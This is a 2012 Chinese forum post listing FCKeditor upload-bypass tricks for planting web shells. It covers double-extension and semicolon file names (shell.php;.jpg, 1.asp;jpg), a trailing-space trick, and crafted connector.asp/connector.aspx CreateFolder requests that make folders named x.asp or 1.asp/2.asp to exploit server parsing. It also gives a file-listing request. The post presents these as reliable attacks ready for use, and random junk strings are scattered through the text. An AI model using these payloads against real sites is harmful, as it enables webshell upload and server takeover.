很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg: {' I; _8 d/ s& |- ?( c+ Q; J
6 i* a- A: K6 U1 F
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
& r. J* N" i% V! f
0 G/ s) S6 f0 O; g2 O继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。* R+ z$ @. l% e0 o, J
0 e }% U; }7 A6 N- K% m突破建立文件夹:
9 l+ `9 ]4 O* K2 E( |0 m! n2 z- f1 O' q) L- F, |: y0 W) R
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
7 [# V. R6 I; [
/ g) G3 K% r) \) T, q参数:
- y, q4 W2 B: c! z( o0 D W) J& V% b) l
当前目录名:CurrentFolder=/qing.asp6 B' D. b( C( ^
( V. C5 T) v5 U8 |% P& A$ m
新的目录名:NewFolderName=x.asp
0 ^4 q1 p# Z! v g7 y- S5 a9 Z* S# N l# W0 C
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
& F* d/ m- V7 l$ Z/ K% q- N
( D+ v9 b& M1 l' R$ J那么 x.asp 就已经建立生成了,此方法百试百灵!
0 V+ d4 D; ~( K8 |- V1 h1 Y. v3 c; {* D$ U: L; B* k
新建文件夹参数 x.asp,基本都能搞定。
% }! P8 e5 V/ u/ F- f8 T( Y
( ^. ]$ {( @+ z3 G2 b下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建 ?. @/ P5 t( R0 z9 {3 M1 P
1 D0 ^' R* T) l" \( Caspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp# n2 o4 V) m! k* K
. T! n% O0 l. K2 b0 ~2 O% |! K2 G
获取文件列表
; ^2 O0 j' k+ ^, a aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F% @7 y! A5 j! m" v [- x
^# {9 t U$ J. Q7 p" [$ _ |
发表于 2012-12-31 09:27:09
收藏
支持
反对